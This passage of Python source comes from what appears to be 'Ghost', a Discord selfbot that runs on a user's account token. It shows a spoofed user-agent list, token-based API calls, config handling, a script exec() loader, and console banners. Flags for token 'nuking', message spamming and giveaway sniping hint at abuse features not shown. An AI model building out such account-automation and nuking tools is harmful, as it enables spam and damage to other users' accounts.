Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3057.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 TC2", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2531.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2264.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2714.0 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1864.6 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Avast/70.0.917.102", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1615.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3608.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2427.7 
Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.61 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.104 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.45 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.45", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.102 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2419.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.114 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64; 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/17.0.1410.63 Safari/537.31", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2583.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/536.36 (KHTML, like Gecko) Chrome/67.2.3.4 
Safari/536.36", "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.69 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Safari/537.36 EdgA/41.0.0.1662", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1"]
userAgent = random.choice(userAgents)
return userAgent
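# Build the CDN URL for a user's avatar; animated hashes ("a_" prefix) use .gif, full URLs are passed through unchanged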
def avatarUrl(id, avatar):
url = ""
if not str(avatar).startswith("http"):
if str(avatar).startswith("a_"):
url = f"https://cdn.discordapp.com/avatars/{id}/{avatar}.gif?size=1024"
else:
url = f"https://cdn.discordapp.com/avatars/{id}/{avatar}.png?size=1024"
return url
else:
return avatar
def iconUrl(id, icon):
    # Guild icons are served from the /icons/ CDN path; animated hashes ("a_" prefix) use .gif
    url = ""
    if str(icon).startswith("a_"):
        url = f"https://cdn.discordapp.com/icons/{id}/{icon}.gif?size=1024"
    else:
        url = f"https://cdn.discordapp.com/icons/{id}/{icon}.png?size=1024"
    return url
def resource_path(relative_path):
# try:
# base_path = sys._MEIPASS
# except Exception:
# base_path = os.path.abspath(".")
# return os.path.join(base_path, relative_path)
return relative_path
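# Fetch the account's relationships from the Discord API and keep only type 1 entries (friends)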
def get_friends(token):
request = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token})
json = request.json()
friends = []
for item in json:
if item["type"] == 1:
friends.append(item["user"])
return friends
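# Console input loop: only commands that declare a "consolecommand" alias can be invoked from the terminal, using the most recent cached message for context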
async def constant_input(bot):
while True:
message = input().lower()
cmd = ""
try:
msgs = bot.cached_messages
ctx = await bot.get_context(msgs[0])
except IndexError:
print("Couldnt get context from cached message. Send a message in discord and try again.")
else:
consoleCommand = False
for command in bot.commands:
if command.name == message:
for alias in command.aliases:
if "consolecommand" in alias.lower():
consoleCommand = True
cmd = alias
break
if consoleCommand:
await ctx.invoke(bot.get_command(cmd))
else:
print("That command can't be ran in the console.")
class Config():
def __init__(self):
self.json = json.load(open("config.json"))
self.token = self.json["token"]
self.prefix = self.json["prefix"]
self.deleteTimeout = self.json["delete_timeout"]
self.theme = self.json["theme"]
self.giveawayJoinDelay = self.json["giveaway_join_delay"]
def getConfig():
return json.load(open("config.json"))
def saveConfig(data):
return json.dump(data, open("config.json", "w"), indent=4, sort_keys=False)
def changeToken(newToken):
global __token__
__token__ = newToken
cfg = Config.getConfig()
cfg["token"] = newToken
Config.saveConfig(cfg)
def changePrefix(newPrefix):
global __prefix__
__prefix__ = newPrefix
Ghost.command_prefix = newPrefix
cfg = Config.getConfig()
cfg["prefix"] = newPrefix
Config.saveConfig(cfg)
def changeDeleteTimeout(newDeleteTimeout):
global __deletetimeout__
newDeleteTimeout = int(newDeleteTimeout)
__deletetimeout__ = newDeleteTimeout
cfg = Config.getConfig()
cfg["delete_timeout"] = newDeleteTimeout
Config.saveConfig(cfg)
def changeGiveawayJoinDelay(newJoinDelay):
global __giveawayjoindelay__
newJoinDelay = int(newJoinDelay)
__giveawayjoindelay__ = newJoinDelay
cfg = Config.getConfig()
cfg["giveaway_join_delay"] = newJoinDelay
Config.saveConfig(cfg)
def changeTheme(newTheme):
    global __embedtitle__, __embedcolour__, __embedfooter__, __embedemoji__, __embedimage__, __embedfooterimage__, __embedcolourraw__, __theme__, __embedlargeimage__
    # Read the theme file once instead of re-opening it for every field
    theme = json.load(open(f"themes/{newTheme}.json"))
    __embedtitle__ = theme["embedtitle"]
    __embedcolour__ = int(theme["embedcolour"].replace('#', '0x'), 0)
    __embedcolourraw__ = theme["embedcolour"]
    __embedfooter__ = theme["embedfooter"]
    __embedemoji__ = theme["globalemoji"]
    __embedimage__ = theme["embedimage"]
    __embedfooterimage__ = theme["embedfooterimage"]
    __embedlargeimage__ = theme["embedlargeimage"]
    __theme__ = newTheme
    cfg = Config.getConfig()
    cfg["theme"] = newTheme
    Config.saveConfig(cfg)
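# Console colour palette: true-colour RGB styles on Windows, colorama colours on Linux/macOS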
if sys.platform == "win32":
ccolourred, ccolourgreen, ccolourblue = hex_to_rgb(__consolecolour__)
fg.consoleColour = Style(RgbFg(ccolourred, ccolourgreen, ccolourblue))
fg.cRed = Style(RgbFg(255, 81, 69))
fg.cOrange = Style(RgbFg(255, 165, 69))
fg.cYellow = Style(RgbFg(255, 255, 69))
fg.cGreen = Style(RgbFg(35, 222, 57))
fg.cBlue = Style(RgbFg(69, 119, 255))
fg.cPurple = Style(RgbFg(177, 69, 255))
fg.cPink = Style(RgbFg(255, 69, 212))
fg.cGrey = Style(RgbFg(207, 207, 207))
fg.cBrown = Style(RgbFg(199, 100, 58))
fg.cBlack = Style(RgbFg(0, 0, 0))
fg.cWhite = Style(RgbFg(255, 255, 255))
elif sys.platform == "linux" or sys.platform == "darwin":
fg.consoleColour = colorama.Fore.BLUE
fg.cRed = colorama.Fore.RED
fg.cOrange = colorama.Fore.YELLOW
fg.cYellow = colorama.Fore.YELLOW
fg.cGreen = colorama.Fore.GREEN
fg.cBlue = colorama.Fore.BLUE
fg.cPurple = colorama.Fore.MAGENTA
fg.cPink = colorama.Fore.MAGENTA
fg.cGrey = colorama.Fore.WHITE
fg.cBlack = colorama.Fore.BLACK
fg.cWhite = colorama.Fore.RESET
if is_windows():
os.system("cls")
os.system(f"title Ghost")
elif is_linux():
os.system("clear")
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
Ghost = commands.Bot(command_prefix=__prefix__, self_bot=True, status=discord.Status.try_value(status))
Ghost.remove_command('help')
Ghost.launch_time = datetime.utcnow()
botStartTime = time.time()
giveawayBots = []
for index in GIVEAWAYBOTS:
giveawayBots.append(int(index))
version = "2.3.9"
cycleStatusText = ""
cycleStatus = False
discordServer = "discord.gg/aWTpaJV4cT"
uwuifyEnabled = False
channelBlankChar = ""
spammingMessages = False
rickRollEnabled = False
nukingToken = False
consoleMode = __consolemode__
consoleModes = ["new", "new2", "new3", "new4", "bear", "old", "react", "rise", "nighty", "rainbow"]
scriptsList = []
afkMode = CONFIG["afkmode"]["enabled"]
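# Execute a custom script file in the global namespace so it can register extra commands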
def include(filename):
global scriptsList
if os.path.exists(filename):
scriptsList.append(filename)
exec(codecs.open(filename, encoding="utf-8").read(), globals(), locals())
# hideText = "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"
if not __custommotd__:
motd = "Developed by Benny | Now maintained by timof121"
else:
motd = __custommotdtext__
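# on_connect: initialise audio, draw the selected console banner, start the console input thread, bump the login counter and enable rich presence if configured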
@Ghost.event
async def on_connect():
if str(sounddevice.query_devices()) != "":
try:
pygame.mixer.init()
except:
pass
width = os.get_terminal_size().columns
if is_windows():
os.system("cls")
os.system(f"title Ghost [{version}] [{Ghost.user}]")
if is_linux():
os.system("clear")
def constant_input2(bot):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(constant_input(bot))
loop.close()
threading.Thread(target=constant_input2, args=(Ghost,)).start()
if consoleMode.lower() == "new":
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rainbow":
print("")
print(fg.consoleColour + "")
print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new2":
print("")
print(fg.consoleColour + "")
print(" ______ __ __ ______ ______ ______ ".center(width))
print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
print(" ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new3":
print("")
print(fg.consoleColour + "")
print(" 88 ".center(width))
print(" 88 ,d ".center(width))
print(" 88 88 ".center(width))
print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
print(' aa, ,88 '.center(width))
print(' "Y8bbdP" '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new4":
print("")
print(fg.consoleColour + "")
print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "bear":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(fg.consoleColour + "")
print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
print("")
print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
print(fg.consoleColour + '─'*os.get_terminal_size().columns)
print("")
elif consoleMode.lower() == "old":
print("")
print(fg.consoleColour + "")
print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
elif consoleMode.lower() not in consoleModes:
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "react":
print("")
print(fg.consoleColour + "")
print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rise":
print(fg.cBlue + "")
print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
print(fg.cGrey + f"Connected: {Ghost.user} | Prefix: {Ghost.command_prefix} | Servers: {len(Ghost.guilds)}".center(width))
print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
print("")
print(fg.cBlue + '━'*width)
print("")
if consoleMode.lower() == "nighty":
if is_windows():
os.system("mode con: cols=90 lines=24")
os.system("cls")
if is_linux():
os.system("resize -s 24 90")
os.system("clear")
print("")
print(f" {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}███████{fg.cBlue}╗{fg.cWhite}████████{fg.cBlue}╗")
print(f" {fg.cWhite}██{fg.cBlue}╔════╝ {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔═══{fg.cWhite}██{fg.cBlue}╗{fg.cWhite}██{fg.cBlue}╔════╝╚══{fg.cWhite}██{fg.cBlue}╔══╝")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}███{fg.cBlue}╗{fg.cWhite}███████{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}███████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔══{fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚════{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}███████{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ")
print("")
print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
print(f"{fg.cWhite}Account: {Ghost.user} [{len(Ghost.guilds)} servers] [{len(get_friends(__token__))} friends]")
print(f"{fg.cWhite}Prefix: {Ghost.command_prefix}")
print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {Ghost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
if "beta" in version.lower():
print_important("You're currently using a beta build of Ghost.")
